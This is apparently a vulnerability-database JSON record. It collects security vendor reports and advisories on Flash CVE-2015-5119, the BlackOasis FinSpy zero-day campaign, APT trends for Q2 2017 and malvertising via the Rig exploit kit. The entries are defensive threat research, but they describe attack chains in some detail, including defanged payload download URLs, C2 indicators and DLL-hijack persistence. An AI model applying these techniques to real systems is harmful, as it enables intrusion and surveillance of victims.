containers, images, and local and remote repositories can be used. Namespace monitoring, flexible mask-based scan scope control and the ability to scan different layers of containers help to enforce secure development best practices.\n\nWe have broken down this list of recommendations into logical sections. Please bear in mind that, besides applying all the measures we have mentioned, you should also audit and check all the generated logs and any other messages regularly. Otherwise you could miss signs of intrusion. A final idea, for security enthusiasts, is to adopt active measures \u2013 to provide system penetration testing from time to time.\n\n### Summary of recommendations:\n\n * Maintain a list of trusted software sources, avoid using unencrypted update channels.\n * Do not run binaries and scripts from untrusted sources. A widely advertised way to install programs with commands like "curl [https://install-url](<http://install-url>) | sudo bash" is a security nightmare.\n * Make sure your update procedure is effective. Set up automatic security updates.\n * Spend time to set up your firewall properly: make sure it logs network activity, block all ports you don't use, minimize your network footprint.\n * Use key-based SSH authentication, protect keys with passwords.\n * Use 2FA and store sensitive keys on external token devices (e.g. Yubikey).\n * Use an out-of-band network tap to independently monitor and analyze network communications of your Linux systems.\n * Maintain system executable file integrity. Review configuration file changes regularly.\n * Be prepared for insider/physical attacks: use full disk encryption, trusted/safe boot and put tamper-evident security tape on your critical hardware.\n * Audit the system, check logs for indicators of attacks.\n * Run penetration tests on your Linux setup.\n * Use a dedicated security solution for Linux with web and network protection, as well as features for DevOps protection.", "modified": "2020-09-10T10:00:39", "published": "2020-09-10T10:00:39", "id": "SECURELIST:DA2F9F352C039B19A1FF5741AA1AA7C4", "href": "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", "type": "securelist", "title": "An overview of targeted attacks and APTs on Linux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-10-16T15:16:55", "bulletinFamily": "blog", "cvelist": ["CVE-2015-5119", "CVE-2016-0984", "CVE-2016-4117", "CVE-2017-11292", "CVE-2017-8759"], "description": "\n\nMore information about BlackOasis APT is available to customers of Kaspersky Intelligence Reporting Service. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n## Introduction\n\nKaspersky Lab has always worked closely with vendors to protect users. As soon as we find new vulnerabilities we immediately inform the vendor in a responsible manner and provide all the details required for a fix.\n\nOn October 10, 2017, Kaspersky Lab's advanced exploit prevention systems identified a new Adobe Flash zero day exploit used in the wild against our customers. The exploit was delivered through a Microsoft Office document and the final payload was the latest version of FinSpy malware. We have reported the bug to Adobe who assigned it [CVE-2017-11292 and released a patch](<https://helpx.adobe.com/security/products/flash-player/apsb17-32.html>) earlier today:\n\n[](<https://securelist.com/files/2017/10/cve_2017_11292_credits.png>)So far only one attack has been observed in our customer base, leading us to believe the number of attacks are minimal and highly targeted.\n\nAnalysis of the payload allowed us to confidently link this attack to an actor we track as \"BlackOasis\". We are also highly confident that BlackOasis was also responsible for another zero day exploit (CVE-2017-8759) discovered by [FireEye](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>) in September 2017. The FinSpy payload used in the current attacks (CVE-2017-11292) shares the same command and control (C2) server as the payload used with CVE-2017-8759 uncovered by FireEye.\n\n## BlackOasis Background\n\nWe first became aware of BlackOasis' activities in May 2016, while investigating another Adobe Flash zero day. On May 10, 2016, Adobe [warned](<https://helpx.adobe.com/security/products/flash-player/apsa16-02.html>) of a vulnerability (CVE-2016-4117) affecting Flash Player 21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and Chrome OS. The vulnerability was actively being exploited in the wild.\n\nKaspersky Lab was able to identify a sample exploiting this vulnerability that was uploaded to a multi scanner system on May 8, 2016. The sample, in the form of an RTF document, exploited CVE-2016-4117 to download and install a program from a remote C&C server. Although the exact payload of the attack was no longer in the C&C, the same server was hosting multiple FinSpy installation packages.\n\nLeveraging data from Kaspersky Security Network, we identified two other similar exploit chains used by BlackOasis in June 2015 which were zero days at the time. Those include CVE-2015-5119 and CVE-2016-0984, which were patched in July 2015 and February 2016 respectively. These exploit chains also delivered FinSpy installation packages.\n\nSince the discovery of BlackOasis' exploitation network, we've been tracking this threat actor with the purpose of better understanding their operations and targeting and have seen a couple dozen new attacks. Some lure documents used in these attacks are shown below:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-1.png>)[](<https://securelist.com/files/2017/10/171016-blackoasis-2.png>)Decoy documents used in BlackOasis attacks\n\nTo summarize, we have seen BlackOasis utilizing at least five zero days since June 2015:\n\n * CVE-2015-5119 - June 2015\n * CVE-2016-0984 - June 2015\n * CVE-2016-4117 - May 2016\n * CVE-2017-8759 - Sept 2017\n * CVE-2017-11292 - Oct 2017\n\n## Attacks Leveraging CVE-2017-11292\n\nThe attack begins with the delivery of an Office document, presumably in this instance via e-mail. Embedded within the document is an ActiveX object which contains the Flash exploit.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-3.png>)[](<https://securelist.com/files/2017/10/171016-blackoasis-4.png>)**Flash object in the .docx file, stored in uncompressed format**\n\nThe Flash object contains an ActionScript which is responsible for extracting the exploit using a custom packer seen in other FinSpy exploits.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-5.png>)**Unpacking routine for SWF exploit**\n\nThe exploit is a memory corruption vulnerability that exists in the \"**com.adobe.tvsdk.mediacore.BufferControlParameters**\" class. If the exploit is successful, it will gain arbitrary read / write operations within memory, thus allowing it to execute a second stage shellcode.\n\nThe first stage shellcode contains an interesting NOP sled with alternative instructions, which was most likely designed in such a way to avoid detection by antivirus products looking for large NOP blocks inside flash files:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-6.png>)NOP sled composed of 0x90 and 0x91 opcodes\n\nThe main purpose of the initial shellcode is to download second stage shellcode from hxxp://89.45.67[.]107/rss/5uzosoff0u.iaf.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-7.png>)**Second stage shellcode**\n\nThe second stage shellcode will then perform the following actions:\n\n 1. Download the final payload (FinSpy) from hxxp://89.45.67[.]107/rss/mo.exe\n 2. Download a lure document to display to the victim from the same IP\n 3. Execute the payload and display the lure document\n\n### Payload - mo.exe\n\nAs mentioned earlier, the \"mo.exe\" payload (MD5: 4a49135d2ecc07085a8b7c5925a36c0a) is the newest version of Gamma International's FinSpy malware, typically sold to nation states and other law enforcement agencies to use in lawful surveillance operations. This newer variant has made it especially difficult for researchers to analyze the malware due to many added anti-analysis techniques, to include a custom packer and virtual machine to execute code.\n\nThe PCODE of the virtual machine is packed with the aplib packer.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-8.png>)**Part of packed VM PCODE**\n\nAfter unpacking, the PCODE it will look like the following:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-9.png>)**Unpacked PCODE**\n\nAfter unpacking the virtual machine PCODE is then decrypted:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-10.png>)**Decrypted VM PCODE**\n\nThe custom virtual machine supports a total of 34 instructions:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-11.png>)**Example of parsed PCODE**\n\nIn this example, the \"1b\" instruction is responsible for executing native code that is specified in parameter field.\n\nOnce the payload is successfully executed, it will proceed to copy files to the following locations:\n\n * C:\\ProgramData\\ManagerApp\\AdapterTroubleshooter.exe\n * C:\\ProgramData\\ManagerApp\\15b937.cab\n * C:\\ProgramData\\ManagerApp\\install.cab\n * C:\\ProgramData\\ManagerApp\\msvcr90.dll\n * C:\\ProgramData\\ManagerApp\\d3d9.dll\n\nThe \"AdapterTroubleshooter.exe\" file is a legitimate binary which is leveraged to use the famous DLL search order hijacking technique. The \"d3d9.dll\" file is malicious and is loaded into memory by the legit binary upon execution. Once loaded, the DLL will then inject FinSpy into the Winlogon process.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-12.png>)**Part of injected code in winlogon process**\n\nThe payload calls out to three C2 servers for further control and exfiltration of data. We have observed two of them used in the past with other FinSpy payloads. Most recently one of these C2 servers was used together with CVE-2017-8759 in the attacks reported by FireEye in September 2017. These IPs and other previous samples tie closely to the BlackOasis APT cluster of FinSpy activity.\n\n## Targeting and Victims\n\nBlackOasis' interests span a wide gamut of figures involved in Middle Eastern politics and verticals disproportionately relevant to the region. This includes prominent figures in the United Nations, opposition bloggers and activists, and regional news correspondents. During 2016, we observed a heavy interest in Angola, exemplified by lure documents indicating targets with suspected ties to oil, money laundering, and other illicit activities. There is also an interest in international activists and think tanks.\n\nVictims of BlackOasis have been observed in the following countries: Russia, Iraq, Afghanistan, Nigeria, Libya, Jordan, Tunisia, Saudi Arabia, Iran, Netherlands, Bahrain, United Kingdom and Angola.\n\n## Conclusions\n\nWe estimate that the attack on HackingTeam in mid-2015 left a gap on the market for surveillance tools, which is now being filled by other companies. One of these is Gamma International with their FinFisher suite of tools. Although Gamma International itself was hacked by Phineas Fisher in 2014, the breach was not as serious as it was in the case of HackingTeam. Additionally, Gamma had two years to recover from the attack and pick up the pace.\n\nWe believe the number of attacks relying on FinFisher software, supported by zero day exploits such as the ones described here will continue to grow.\n\nWhat does it mean for everyone and how to defend against such attacks, including zero-day exploits?\n\nFor CVE-2017-11292 and other similar vulnerabilities, one can use [the killbit](<https://answers.microsoft.com/en-us/windows/forum/windows_8-update/flashplayer-updates/cd258a3f-cd87-4ea9-bdb6-074d06ad491e?auth=1>) for Flash within their organizations to disable it in any applications that respect it. Unfortunately, doing this system-wide is not easily done, as Flash objects can be loaded in applications that potentially do not follow the killbit. Additionally, this may break any other necessary resources that rely on Flash and of course, it will not protect against exploits for other third party software.\n\nDeploying a multi-layered approach including access policies, anti-virus, network monitoring and whitelisting can help ensure customers are protected against threats such as this. Users of Kaspersky products are protected as well against this threat by one of the following detections:</p style=\"margin-bottom:0!important\">\n\n * PDM:Exploit.Win32.Generic\n * HEUR:Exploit.SWF.Generic\n * HEUR:Exploit.MSOffice.Generic\n\nMore information about BlackOasis APT is available to customers of Kaspersky Intelligence Reporting Service. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n## Acknowledgements\n\nWe would like to thank the Adobe Product Security Incident Response Team (PSIRT) for working with us to identify and patch this vulnerability.\n\n## References\n\n 1. Adobe Bulletin <https://helpx.adobe.com/security/products/flash-player/apsb17-32.html>\n\n## Indicators of compromise\n\n4a49135d2ecc07085a8b7c5925a36c0a \n89.45.67[.]107", "modified": "2017-10-16T14:28:47", "published": "2017-10-16T14:28:47", "id": "SECURELIST:56D279C45B0C4431FBA76FDF2EC365A1", "href": "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/", "title": "BlackOasis APT and new targeted attacks leveraging zero-day exploit", "type": "securelist", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-29T03:16:10", "bulletinFamily": "blog", "cvelist": ["CVE-2015-5119", "CVE-2016-0984", "CVE-2016-4117", "CVE-2017-0199", "CVE-2017-0261", "CVE-2017-0262", "CVE-2017-0263"], "description": "\n\n## Introduction\n\nSince 2014, Kaspersky Lab's Global Research and Analysis Team (GReAT) has been providing threat intelligence reports to a wide-range of customers worldwide, leading to the delivery of a full and dedicated private reporting service. Prior to the new service offering, GReAT published research online for the general public in an effort to help combat the ever-increasing threat from nation-state and other advanced actors. Since we began offering a threat intelligence service, all deep technical details on advanced campaigns are first pushed to our subscriber base. At the same time, to remain true to our efforts to help make the internet safer, important incidents, such as WannaCry or Petya are covered in both private and public reports.\n\n[](<https://securelist.com/files/2017/08/APT-report-Q2-2017-1.png>)\n\nKaspersky's Private Threat Intelligence Portal (TIP)\n\nIn Q1 of 2017 we published our [first APT Trends report](<https://securelist.com/apt-trends-report-q1-2017/78169/>), highlighting our top research findings over the last few months. We will continue to publish quarterly reports as a representative snapshot of what has been offered in greater detail in our private reports in order to highlight significant events and findings we feel most users should be aware of. If you would like to learn more about our intelligence reports or request more information for a specific report, readers are encouraged to contact: **intelreports@kaspersky.com**.\n\n## Russian-Speaking Actors\n\nThe second quarter of 2017 has seen multiple incidents involving Russian-speaking threat actors. Topping the list of 'attention grabbers' were the Sofacy and Turla threat actors.\n\nMarch and April started off with a bang, with the discovery of three zero-day exploits being used in-the-wild by Sofacy and Turla: two of these targeted Microsoft Office's Encapsulated PostScript (EPS) and the third being a Microsoft Windows Local Privilege Escalation (LPE). Sofacy was discovered utilizing both CVE-2017-0262 (an EPS vulnerability) and CVE-2017-0263 (LPE) over the Easter holiday, targeting a swath of users throughout Europe. Prior to this attack, Turla was also discovered using CVE-2017-0261 (a different EPS vulnerability). Neither actor appeared to deviate from their usual payload repertoire, with Sofacy dropping their typical GAMEFISH payload and Turla utilizing what we refer to as ICEDCOFFEE (a.k.a. Shirime). Targeting for these attacks was also directly within the normal wheelhouse for both actors, focusing mainly on foreign ministries, governments, and other government-affiliated organizations.\n\nGReAT produced additional reports on Sofacy and Turla beyond those mentioned above. In April, we notified customers of two new experimental macro techniques utilized by Sofacy. These techniques, while not particularly sophisticated, caught our attention as they had not been seen before in-the-wild. The first technique involved using the built-in 'certutil' utility in Microsoft Windows to extract a hardcoded payload within a macro. The second technique involved embedding Base64-encoded payloads within the EXIF metadata of the malicious documents. While the targeting for this new set of activity was again fairly standard, we discovered some noteworthy targeting against a French political party member prior to the 2017 elections. Moving into May and June, we wrote two additional reports of interest involving these two actors: the first was an update on the long running \"Mosquito Turla\" campaign showing the usage of fake Adobe Flash installers and continued targeting of foreign Ministries. The other documented yet another update on Sofacy's unique Delphi payload we call 'Zebrocy'.\n\nJune saw the massive outbreak of a piece of malware [dubbed](<https://securelist.com/schroedingers-petya/78870/>) \"ExPetr\". While initial assessments presumed that this was yet another ransomware attack \u00e0 la WannaCry, a deeper assessment by GReAT places the initial intent as constituting an operation destructive in nature. We were also able to confidently identify the initial distribution of the malware, as well as indicate a _low confidence _assessment that the attacks may share traits with the BlackEnergy actors. \n\n[](<https://securelist.com/files/2017/08/APT-report-Q2-2017-2.png>)\n\nBelow is a summary of report titles produced for the Eastern European region only. As stated above, if you would like to learn more about our threat intelligence products or request more information on a specific report, please direct inquiries to **intelreports@kaspersky.com**.\n\n 1. Sofacy Dabbling in New Macro Techniques\n 2. Sofacy Using Two Zero Days in Recent Targeted Attacks - early warning\n 3. Turla EPS Zero Day - early warning\n 4. Mosquito Turla Targets Foreign Affairs Globally\n 5. Update on Zebrocy Activity June 2017\n 6. ExPetr motivation and attribution - Early alert\n 7. BlackBox ATM attacks using SDC bus injection\n\n## English-Speaking Actors\n\nEnglish-speaking actors are always particularly fascinating due to their history of complex tooling and campaigns. Actors like Regin and Project Sauron have proven fascinating examples of new techniques leveraged in long-lasting, hard to catch campaigns and as such make ideal subjects for further research. Not to be outdone, Equation and the Lamberts were the subjects of our most recent investigations.\n\nContinuing our practice of conducting malware paleontology while integrating new discoveries, we published a report on EQUATIONVECTOR, an Equation backdoor first used as early as 2006. This backdoor is a fascinating passive-active shellcode staging implant. It's one of the earliest noted instances of a NObody But US ('NOBUS') backdoor for staging further attacks. Despite its age, the EQUATIONVECTOR backdoor (identified as 'PeddleCheap' in the latest ShadowBrokers disclosures) incorporates many advanced techniques for prolonged stealthy operations in victim networks, allowing the Equation operators to deliver further payloads without arousing suspicion. The report tracks the development of these tools through subsequent iterations year-by-year.\n\nOur tracking of the Lamberts toolkit continues with the publication of the Gray Lambert report in June, the most advanced Lambert known to date. This too is a NOBUS backdoor, a passive implant operating strictly in user-land. The intricate usefulness of Gray Lambert lies in its ability to orchestrate multiple sniffer victims on a network via broadcast, multicast, and unicast commands, allowing the operators to employ surgical precision in networks with many infected machines. The sniffers double as next-stage payload delivery mechanisms for an infected network. A notable feature of the Lambert campaigns is the level of precision with which targets are chosen; Gray Lambert's victimology is primarily focused on strategic verticals in Asia and Middle East. During this investigation, GReAT researchers have also discovered two additional Lambert families (Red Lambert and Brown Lambert) currently under investigation for Q3. Below is a list of report titles for reference:\n\n 1. EQUATIONVECTOR - A Generational Breakdown of the PeddleCheap Multifunctional Backdoor\n 2. The Gray Lambert \u2013 A Leap in Sophistication to User-land NOBUS Passive Implants\n\n## Korean-speaking Actors\n\nOur researchers focusing on attacks with a Korean nexus also had a very busy quarter, producing seven reports on the Lazarus group and WannaCry attacks. Most of the reports on Lazarus directly involved a sub-group we refer to as BlueNoroff. They are the arm that focuses mainly on financial gain, targeting banks, ATMs, and other \"money-makers\". We revealed to customers a previously unknown piece of malware dubbed 'Manuscrypt' used by Lazarus to target not only diplomatic targets in South Korea, but also people using virtual currency and electronic payment sites. Most recently, 'Manuscrypt' has become the primary backdoor used by the BlueNoroff sub-group to target financial institutions.\n\nWannaCry also created quite a stir in the second quarter, with our analysts producing three reports and multiple blog posts on this emerging threat. What proved most interesting to us, was the probable linkage to Lazarus group as the source of the attacks, as well as the origins of the malware. GReAT researchers were able to trace back some of its earliest usage and show that before the 'EternalBlue' exploit was added to version 2, WannaCry v1 was used in spearphishing attacks months prior. Here is a listing of our reports from Q2 on actors with a Korean nexus:\n\n 1. Manuscrypt - malware family distributed by Lazarus\n 2. Lazarus actor targets carders\n 3. Lazarus-linked ATM Malware On the Loose In South Korea\n 4. Lazarus targets electronic currency operators\n 5. WannaCry - major ransomware attack hitting businesses worldwide - early alert\n 6. WannaCry possibly tied to the Lazarus APT Group\n 7. The First WannaCry Spearphish and Module Distribution\n\n## Middle Eastern Actors\n\nWhile there wasn't much high-end activity involving Middle Eastern actors, we did produce two reports revolving around the use of a zero-day exploit (CVE-2017-0199). The most notable involved an actor we refer to as BlackOasis and their usage of the exploit in-the-wild prior to its discovery. We have previously reported on BlackOasis using other zero-days in the past; CVE-2016-4117 in May 2016, CVE-2016-0984 in June 2015, and CVE-2015-5119 in June 2015. It is believed that BlackOasis is a customer of Gamma Group and utilizes the popular 'lawful surveillance' kit FinSpy. Other than the usage of the exploit, this report was significant because it also showed one of the earliest known uses of a new version of FinSpy, which is still being analyzed by our researchers.\n\nAfter the discovery of CVE-2017-0199, a plethora of threat actors also began to leverage this exploit in their attacks. We reported to customers on the usage of this exploit by a well-known Middle Eastern actor dubbed 'OilRig'. OilRig has actively targeted many organizations in Israel with the exploit via spearphishes appearing to originate from well-known doctors within Ben Gurion University. While their execution was less than stellar, it highlighted the widespread usage of this exploit shortly after its discovery.\n\n 1. OilRig exploiting CVE-2017-0199 in new campaign\n 2. BlackOasis using Ole2Link zero day exploit in the wild\n\n## Chinese-Speaking Actors\n\nOn the Chinese speaking front, we felt it necessary to produce two reports to our customers. While Chinese speaking actors are active on a daily basis, not much has changed and we prefer to avoid producing reports on 'yet another instance of APTxx' for the sake of padding our numbers. Instead we try to focus on new and exciting campaigns that warrant special attention.\n\nOne of those reports detailed a new finding regarding a fileless version of the well-known 'HiKit' malware dubbed 'Hias'. We have reported on Hias in the past, and one of our researchers was finally able to discover the persistence mechanism used, which also allowed us to tie the activity to an actor we call 'CloudComputating'.\n\nAnother report detailed a new campaign we referred to as 'IndigoZebra'. This campaign was targeting former Soviet Republics with a wide swath of malware including Meterpreter, Poison Ivy, xDown, and a previously unknown malware called 'xCaon'. This campaign shares ties with other well-known Chinese-speaking actors, but no definitive attribution has been made at this time.\n\n 1. Updated technical analysis of Hias RAT\n 2. IndigoZebra - Intelligence preparation to high-level summits in Middle Asia\n\n## Best of the rest\n\nSometimes we find new and exciting campaigns or entirely new threat actors to report to our subscribers without being able to make an immediate or definitive determination on regional provenance. Several reports fell into this category in the last quarter. ChasingAdder is a report describing a new persistence technique that hijacked a legitimate WMI DLL for the purposes of loading a malicious payload. This activity targeted high-profile diplomatic, military, and research organizations beginning in the fall of 2016, but to date we have not been able to pinpoint the specific actor responsible.\n\nDemsty is a new piece of MacOS malware that is targeting University researchers in Hong Kong, among others. At the time of writing, we have a low confidence assessment that the campaign was conducted by Chinese-speaking actors, and thus categorize this as 'Unknown' until greater evidence comes to light.\n\nDuring Q2, the mischievous ShadowBrokers also continued their regular activities dumping multiple tools and documentation allegedly stolen from Equation Group. In April, the ShadowBrokers released another dump of information detailing the alleged targeting of SWIFT service bureaus and other banks by Equation Group. Since some of our customers are financial entities, we found it necessary to evaluate the data and provide an expert's opinion on the validity of the dump.\n\nReports in the 'unknown' category:\n\n 1. ShadowBrokers' Lost in translation leak - SWIFT attacks analysis\n 2. ChasingAdder - WMI DLL Hijacking Trojan Targeting High Profile Victims\n 3. University Researchers Located in Hong Kong Targeted with Demsty\n\n## Predictions\n\nBased on the trends we've seen over the last three months, as well as foreseeable geopolitical events, we have listed a few predictions for the upcoming quarter (Q3). As always, this isn't an exact science and some cases won't come to fruition. Analyzing current and future events and combining those with the motivations of known active actors can help organizations prepare for likely forthcoming activity:\n\n 1. Misinformation campaigns will remain a threat to countries with upcoming elections, specifically Germany and Norway, as they have been previous targets for Eastern European based actors.\n 2. 'Lawful Surveillance' tools will continue to be utilized by governments that don't have well-established Cyber Operations capabilities, mainly based out of the Middle East. Companies such as Gamma Group, Hacking Team, and NSO will continue to offer new zero-day exploits to those customers. As prices increase and exchanges thrive, new organizations and marketplaces will continue popping up.\n 3. Destructive malware disguised as ransomware will continue to be a problem. In the last quarter we've seen two instances of this, and with the continued release of tools / exploits from dumps like Vault7 and ShadowBrokers, this is going to be a new alarming trend to deal with.\n 4. In China, the past months have been marked by the dwindling economic growth, rising tensions with North Korea and the US, and increased exchanges between South Korean / Japanese / American organizations. In addition to these, the 19th Party Congress is set to be held in the fall of 2017 and according to multiple public predictions, it is likely that some major changes will happen in the leadership. It's possible that these events will have wide regional influences that could affect the way that threat actors operate in Asia, both in terms of targeting and TTPs.\n 5. Targeting energy-related companies and organizations will be on the rise. Countries such as Norway may be a top target moving forward given their control on oil and gas in the region in the buildup to an election. Saudi Arabia will also top the charts for potential targeting as they have in years past.\n 6. Lower-tier threat actors continue to increase cyber-espionage efforts and capabilities both in complexity and size. Expect more activity with varied technical capabilities coming from lesser known or previously unseen actors.\n\n## How to keep yourself protected\n\nOne of the biggest problems when it comes to leveraging threat intelligence is judging the quality of the data and how it can be used for defense. For instance, we may observe an increase in the number of fileless attacks or attacks in which all IOCs are unique or specific per victim. In such situations, having not only host-based IOCs, but also network IOCs and Yara rules that can help identify malware in all cases is very important.\n\nAnother problem comes from the fact that many threat intelligence providers have a limited world view and their data covers only a small set of threats. It's easy for an enterprise to fall into the trap of thinking that 'actor X' is not something they need to worry because their focus has been only certain countries or certain industry sectors; only to discover later that their ignorance left them blind to those attacks.\n\nAs shown by many incidents, but especially by WannaCry and ExPetr's EternalBlue-based spreading subroutines, vulnerabilities remain a key approach to infecting systems. Therefore timely patching is of utmost importance \u2013 which, being one of the most tedious IT maintenance tasks, works much better with good automation. Kaspersky Endpoint Security for Business Advanced and Kaspersky Total Security include Vulnerability & Patch management components, offering convenient tools for making patching much easier, and much less time-consuming for IT staff.\n\nGiven the above, it is highly recommended that prevention (such as endpoint protection) along with advanced detection capabilities, such as a solution that can detect all types of anomalies and scrutinize suspicious files at a deeper level, be present on users' systems. The Kaspersky Anti Targeted Attack solution (KATA) matches events coming from different infrastructure levels, discerns anomalies and aggregates them into incidents, while also studying related artifacts in a safe environment of a sandbox. As with most Kaspersky products, KATA is powered by HuMachine Intelligence, which is backed by on premise and in lab-running machine learning processes coupled with real-time analyst expertise and our understanding of threat intelligence big data.\n\nThe best way to prevent attackers from finding and leveraging security holes, is to eliminate the holes altogether, including those involving improper system configurations or errors in proprietary applications. For this, Kaspersky Penetration Testing and Application Security Assessment services can become a convenient and highly effective solution, providing not only data on found vulnerabilities, but also advising on how to fix it, further strengthening corporate security.", "modified": "2017-08-08T14:00:40", "published": "2017-08-08T14:00:40", "href": "https://securelist.com/apt-trends-report-q2-2017/79332/", "id": "SECURELIST:75F0B75D28318C525992E42495D8C5EE", "title": "APT Trends report Q2 2017", "type": "securelist", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cisa": [{"lastseen": "2021-02-24T18:08:05", "bulletinFamily": "info", "cvelist": ["CVE-2015-5119"], "description": "Adobe has released security updates to address multiple vulnerabilities in Flash Player for Windows, Macintosh, and Linux. These include a critical vulnerability ([CVE-2015-5119](<http://helpx.adobe.com/security/products/flash-player/apsa15-03.html>)) in Adobe Flash Player 18.0.0.194 and earlier versions. Adobe is aware of a report that an exploit targeting CVE-2015-5119 has been made publicly available.\n\nUsers and administrators are encouraged to review Adobe Security Bulletin [APSB15-16](<http://helpx.adobe.com/security/products/flash-player/apsb15-16.html>) and apply the necessary updates.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2015/07/08/Adobe-Releases-Security-Updates-Flash-Player>); we'd welcome your feedback.\n", "modified": "2015-07-08T00:00:00", "published": "2015-07-08T00:00:00", "id": "CISA:2A8422190E3030D1FA551BC2C97714D9", "href": "https://us-cert.cisa.gov/ncas/current-activity/2015/07/08/Adobe-Releases-Security-Updates-Flash-Player", "type": "cisa", "title": "Adobe Releases Security Updates for Flash Player", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:37", "bulletinFamily": "unix", "cvelist": ["CVE-2015-5119"], "description": "A critical vulnerability (use-after-free in the AS3 ByteArray class) has\nbeen identified in Adobe Flash Player 18.0.0.194 and earlier versions\nfor Windows, Macintosh and Linux. Successful exploitation could cause a\ncrash and potentially allow an attacker to take control of the affected\nsystem.\n\nAdobe is aware of reports that an exploit targeting this vulnerability\nhas been published publicly.", "modified": "2015-07-08T00:00:00", "published": "2015-07-08T00:00:00", "id": "ASA-201507-7", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-July/000361.html", "type": "archlinux", "title": "flashplugin: remote code execution", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fireeye": [{"lastseen": "2017-03-07T16:24:18", "bulletinFamily": "info", "cvelist": ["CVE-2015-5119"], "description": "\n\nThreat Overview\n\nThe online advertisements that people see across a wide range of popular and lesser-known websites can lead to malware infections and other forms of compromise, sometimes without any user interaction whatsoever and without any indicators there is an issue.\n\nThis emerging threat is known as malvertising (a portmanteau of \u2018malicious\u2019 and \u2018advertising\u2019), and FireEye Labs recently uncovered an ongoing campaign involving online advertising network onclickads[.]net, a domain with an Alexa global rank of 39 and 113 in the United States. Onclickads[.]net is operated by Propeller Ads Media, an online advertising exchange.\n\nIn this case, websites serving ad content from onclickads[.]net could infect visitors by first redirecting them to the Rig Exploit Kit. An exploit kit is essentially a toolkit that automatically targets specified software vulnerabilities \u2013 primarily to distribute malware.\n\nThe FireEye Dynamic Threat Intelligence (DTI) first detected the malvertising activity on Oct. 6, 2015, and the campaign is still active today. Those redirected to the Rig Exploit Kit landing page could be compromised via exploits targeting Adobe Flash, Internet Explorer, Java and Microsoft Silverlight.\n\nFor the everyday Internet user, the threat would play out like this: The user navigates to a website; the website serves a malicious advertisement from onclickads[.]net; the user is redirected to the Rig Exploit Kit landing page and one of several vulnerabilities is targeted.\n\nFor this particular campaign, a completely successful attack results in the user becoming infected with malware.\n\nTechnical Details\n\nDTI detected Rig Exploit Kit URLs on a daily basis and each URL had a similar HTTP Referer header field belonging to onclickads[.]net, as shown in Figure 1.\n\n\n\nFigure 1. Example onclickads[.]net referers seen redirecting to Rig Exploit Kit\n\nMalvertising attacks can be difficult to identify, but in this case, as shown in Figure 2, it starts with a normal looking ad content HTTP GET request made when visiting a site that serves ad content from onclickads[.]net.\n\n\n\nFigure 2. GET request to onclickads[.]net\n\nLooking a little closer, we see that the URL contains strings that slightly resemble those used by OpenX/Revive ad servers, one the most popular ad software systems on the market.\n\nCommonly seen, legitimate OpenX/Revive URLs might look something like this:\n\n/www/delivery/afr.php?zoneid=8&cb=1925363925374\n\nWe checked out a copy of the OpenX repository to review the contents. While the repository contains a legitimate file named afr.php, there was no file named afu.php as shown in the GET request from Figure 2.\n\nAlthough ad servers are often abused by malvertisers, OpenX systems and their associated URLs are normally not an indication of malicious activity, just advertising activity; so it\u2019s common to see them mixed in with other HTTP traffic in most network environments. You can see how the malicious traffic associated with this malvertising campaign might slip by with other OpenX advertising traffic since it closely resembles that of a legitimate ad system.\n\nOnclickads[.]net appears to have previously been involved in malvertising activity. The online advertising network was recently used in a similar campaign involving the Angler Exploit Kit, and \u2013 as seen in Figure 3 \u2013 we have still observed redirections to fake Flash media players.\n\n\n\nFigure 3. Some referer URLs redirected to fake media players when visited\n\nAs mentioned before, those who are redirected to the Rig Exploit Kit landing page could be compromised via exploits targeting Adobe Flash, Internet Explorer, Java and Microsoft Silverlight.\n\nExamples of Rig Exploit Kit landing page URLs we logged can be seen in Figure 4. These all had an onclickads[.]net URL (similar to Figure 1) in the referer field.\n\n\n\nFigure 4. Rig Exploit Kit URLs\n\nAs shown in Figure 5, the Rig Exploit Kit obfuscates its landing pages to make analysis and detection tougher. The landing page contains code that checks for the presence of antivirus or virtual environments \u2013 if either is detected by the exploit kit, the exploit will not be served.\n\n\n\nFigure 5. Obfuscated Rig Exploit Kit landing page\n\nThe samples we analyzed used an exploit for CVE-2015-5119, the Adobe Flash use-after-free vulnerability revealed in the Hacking Team leak. As mentioned [here](<http://malware.dontneedcoffee.com/2015/07/hackingteam-flash-0d-cve-2015-xxxx-and.html>), CVE-2015-5119 was integrated into Rig Exploit Kit in July. After the landing page loads, the Flash exploit is downloaded, as seen in Figure 6.\n\n\n\nFigure 6. Flash exploit being downloaded\n\nAfter successful exploitation, the payload downloads malware to the system.\n\nAs of Nov. 13, 2015, the exploit kit is redirecting to Magnitude EK URLs. 